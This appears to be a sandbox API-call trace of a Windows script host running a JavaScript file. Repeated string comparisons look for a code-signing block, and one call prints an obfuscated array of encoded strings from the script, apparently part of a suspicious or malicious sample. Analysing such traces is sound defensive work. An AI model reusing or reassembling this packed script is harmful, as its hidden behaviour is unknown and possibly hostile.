	[0073.372] wcsncmp (_String1="Aw69Dw79yA8OW','w5/Cn8KKbMK5HsOef", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0073.372] wcsncmp (_String1="w69Dw79yA8OW','w5/Cn8KKbMK5HsOefs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.372] wcsncmp (_String1="69Dw79yA8OW','w5/Cn8KKbMK5HsOefsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 41
	[0073.372] wcsncmp (_String1="9Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0073.372] wcsncmp (_String1="Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0073.372] wcsncmp (_String1="w79yA8OW','w5/Cn8KKbMK5HsOefsOg',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.372] wcsncmp (_String1="79yA8OW','w5/Cn8KKbMK5HsOefsOg','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0073.372] wcsncmp (_String1="9yA8OW','w5/Cn8KKbMK5HsOefsOg','M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0073.373] wcsncmp (_String1="yA8OW','w5/Cn8KKbMK5HsOefsOg','ME", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 108
	[0073.373] wcsncmp (_String1="A8OW','w5/Cn8KKbMK5HsOefsOg','MEr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0073.373] wcsncmp (_String1="8OW','w5/Cn8KKbMK5HsOefsOg','MErC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0073.373] wcsncmp (_String1="OW','w5/Cn8KKbMK5HsOefsOg','MErCs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0073.373] wcsncmp (_String1="W','w5/Cn8KKbMK5HsOefsOg','MErCsE", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 74
	[0073.373] wcsncmp (_String1="','w5/Cn8KKbMK5HsOefsOg','MErCsEP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0073.373] wcsncmp (_String1=",'w5/Cn8KKbMK5HsOefsOg','MErCsEPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0073.373] wcsncmp (_String1="'w5/Cn8KKbMK5HsOefsOg','MErCsEPDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0073.373] wcsncmp (_String1="w5/Cn8KKbMK5HsOefsOg','MErCsEPDhc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.373] wcsncmp (_String1="5/Cn8KKbMK5HsOefsOg','MErCsEPDhcK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0073.373] wcsncmp (_String1="/Cn8KKbMK5HsOefsOg','MErCsEPDhcKa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0073.373] wcsncmp (_String1="Cn8KKbMK5HsOefsOg','MErCsEPDhcKac", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0073.373] wcsncmp (_String1="n8KKbMK5HsOefsOg','MErCsEPDhcKacR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0073.373] wcsncmp (_String1="8KKbMK5HsOefsOg','MErCsEPDhcKacRH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0073.373] wcsncmp (_String1="KKbMK5HsOefsOg','MErCsEPDhcKacRHC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0073.373] wcsncmp (_String1="KbMK5HsOefsOg','MErCsEPDhcKacRHCm", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0073.373] wcsncmp (_String1="bMK5HsOefsOg','MErCsEPDhcKacRHCmA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0073.373] wcsncmp (_String1="MK5HsOefsOg','MErCsEPDhcKacRHCmA=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0073.373] wcsncmp (_String1="K5HsOefsOg','MErCsEPDhcKacRHCmA==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0073.373] wcsncmp (_String1="5HsOefsOg','MErCsEPDhcKacRHCmA=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0073.373] wcsncmp (_String1="HsOefsOg','MErCsEPDhcKacRHCmA==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0073.373] wcsncmp (_String1="sOefsOg','MErCsEPDhcKacRHCmA==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0073.373] wcsncmp (_String1="OefsOg','MErCsEPDhcKacRHCmA==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0073.373] wcsncmp (_String1="efsOg','MErCsEPDhcKacRHCmA==','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0073.373] wcsncmp (_String1="fsOg','MErCsEPDhcKacRHCmA==','woz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0073.373] wcsncmp (_String1="sOg','MErCsEPDhcKacRHCmA==','wozD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0073.373] wcsncmp (_String1="Og','MErCsEPDhcKacRHCmA==','wozDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0073.373] wcsncmp (_String1="g','MErCsEPDhcKacRHCmA==','wozDhs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0073.373] wcsncmp (_String1="','MErCsEPDhcKacRHCmA==','wozDhsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0073.373] wcsncmp (_String1=",'MErCsEPDhcKacRHCmA==','wozDhsKi", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0073.373] wcsncmp (_String1="'MErCsEPDhcKacRHCmA==','wozDhsKiw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0073.373] wcsncmp (_String1="MErCsEPDhcKacRHCmA==','wozDhsKiwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0073.373] wcsncmp (_String1="ErCsEPDhcKacRHCmA==','wozDhsKiwrP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0073.373] wcsncmp (_String1="rCsEPDhcKacRHCmA==','wozDhsKiwrPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0073.373] wcsncmp (_String1="CsEPDhcKacRHCmA==','wozDhsKiwrPDl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0073.373] wcsncmp (_String1="sEPDhcKacRHCmA==','wozDhsKiwrPDl8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0073.373] wcsncmp (_String1="EPDhcKacRHCmA==','wozDhsKiwrPDl8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0073.374] wcsncmp (_String1="PDhcKacRHCmA==','wozDhsKiwrPDl8Kx", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0073.374] wcsncmp (_String1="DhcKacRHCmA==','wozDhsKiwrPDl8KxF", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0073.374] wcsncmp (_String1="hcKacRHCmA==','wozDhsKiwrPDl8KxFA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0073.374] wcsncmp (_String1="cKacRHCmA==','wozDhsKiwrPDl8KxFAY", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0073.374] wcsncmp (_String1="KacRHCmA==','wozDhsKiwrPDl8KxFAY=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0073.374] wcsncmp (_String1="acRHCmA==','wozDhsKiwrPDl8KxFAY='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0073.374] wcsncmp (_String1="cRHCmA==','wozDhsKiwrPDl8KxFAY=',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0073.374] wcsncmp (_String1="RHCmA==','wozDhsKiwrPDl8KxFAY=','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0073.374] wcsncmp (_String1="HCmA==','wozDhsKiwrPDl8KxFAY=','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0073.374] wcsncmp (_String1="CmA==','wozDhsKiwrPDl8KxFAY=','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0073.374] wcsncmp (_String1="mA==','wozDhsKiwrPDl8KxFAY=','woH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 96
	[0073.374] wcsncmp (_String1="A==','wozDhsKiwrPDl8KxFAY=','woHD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0073.374] wcsncmp (_String1="==','wozDhsKiwrPDl8KxFAY=','woHDt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0073.374] wcsncmp (_String1="=','wozDhsKiwrPDl8KxFAY=','woHDt2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0073.374] wcsncmp (_String1="','wozDhsKiwrPDl8KxFAY=','woHDt2Z", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0073.374] wcsncmp (_String1=",'wozDhsKiwrPDl8KxFAY=','woHDt2Zc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0073.374] wcsncmp (_String1="'wozDhsKiwrPDl8KxFAY=','woHDt2ZcP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0073.374] wcsncmp (_String1="wozDhsKiwrPDl8KxFAY=','woHDt2ZcPM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.374] wcsncmp (_String1="ozDhsKiwrPDl8KxFAY=','woHDt2ZcPMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0073.374] wcsncmp (_String1="zDhsKiwrPDl8KxFAY=','woHDt2ZcPMOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0073.374] wcsncmp (_String1="DhsKiwrPDl8KxFAY=','woHDt2ZcPMOsG", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0073.374] wcsncmp (_String1="hsKiwrPDl8KxFAY=','woHDt2ZcPMOsGX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0073.374] wcsncmp (_String1="sKiwrPDl8KxFAY=','woHDt2ZcPMOsGXt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0073.374] wcsncmp (_String1="KiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0073.374] wcsncmp (_String1="iwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0073.374] wcsncmp (_String1="wrPDl8KxFAY=','woHDt2ZcPMOsGXtZQc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.374] wcsncmp (_String1="rPDl8KxFAY=','woHDt2ZcPMOsGXtZQcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0073.374] wcsncmp (_String1="PDl8KxFAY=','woHDt2ZcPMOsGXtZQcOI", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0073.374] wcsncmp (_String1="Dl8KxFAY=','woHDt2ZcPMOsGXtZQcOIw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0073.374] wcsncmp (_String1="l8KxFAY=','woHDt2ZcPMOsGXtZQcOIwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0073.374] wcsncmp (_String1="8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0073.374] wcsncmp (_String1="KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0073.374] wcsncmp (_String1="xFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0073.374] wcsncmp (_String1="FAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57
	[0073.374] wcsncmp (_String1="AY=','woHDt2ZcPMOsGXtZQcOIwrnDj1l", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0073.374] wcsncmp (_String1="Y=','woHDt2ZcPMOsGXtZQcOIwrnDj1lV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 76
	[0073.374] wcsncmp (_String1="=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0073.375] wcsncmp (_String1="','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0073.375] wcsncmp (_String1=",'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0073.375] wcsncmp (_String1="'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOU", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0073.375] wcsncmp (_String1="woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOUR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.375] wcsncmp (_String1="oHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0073.375] wcsncmp (_String1="HDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHf", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0073.375] wcsncmp (_String1="Dt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0073.375] wcsncmp (_String1="t2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0073.375] wcsncmp (_String1="2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0073.375] wcsncmp (_String1="ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0073.375] wcsncmp (_String1="cPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0k", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0073.375] wcsncmp (_String1="PMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0073.375] wcsncmp (_String1="MOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0073.375] wcsncmp (_String1="OsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4t", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0073.375] wcsncmp (_String1="sGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0073.375] wcsncmp (_String1="GXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 58
	[0073.375] wcsncmp (_String1="XtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0073.375] wcsncmp (_String1="tZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4R", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0073.375] wcsncmp (_String1="ZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0073.375] wcsncmp (_String1="QcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0073.375] wcsncmp (_String1="cOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0073.375] wcsncmp (_String1="OIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0073.375] wcsncmp (_String1="IwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 60
	[0073.375] wcsncmp (_String1="wrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0073.375] wcsncmp (_String1="rnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0073.375] wcsncmp (_String1="nDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0073.375] wcsncmp (_String1="Dj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Om", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0073.375] wcsncmp (_String1="j1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0073.375] wcsncmp (_String1="1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0073.375] wcsncmp (_String1="lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5J", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0073.375] wcsncmp (_String1="VNsOURHfDgl0kw4tDw4RSw7HCn8Omw5Jp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0073.375] wcsncmp (_String1="NsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0073.375] wcsncmp (_String1="sOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0073.375] wcsncmp (_String1="OURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0073.375] wcsncmp (_String1="URHfDgl0kw4tDw4RSw7HCn8Omw5JpXDot", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 72
	[0073.375] wcsncmp (_String1="RHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0073.376] wcsncmp (_String1="HfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0073.376] wcsncmp (_String1="fDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0073.376] wcsncmp (_String1="Dgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0073.378] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0073.378] CloseCodeAuthzLevel () returned 0x1
	[0073.378] FreeLibrary (hLibModule=0x7fefd710000) returned 1
	[0073.378] ??2@YAPEAX_K@Z () returned 0x2bf3f0
	[0073.378] SysStringLen (param_1="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 0x4b68
	[0073.378] GetProcessHeap () returned 0x380000
	[0073.378] RtlReAllocateHeap (Heap=0x380000, Flags=0x0, Ptr=0x3b8430, Size=0x11238) returned 0x3eae20
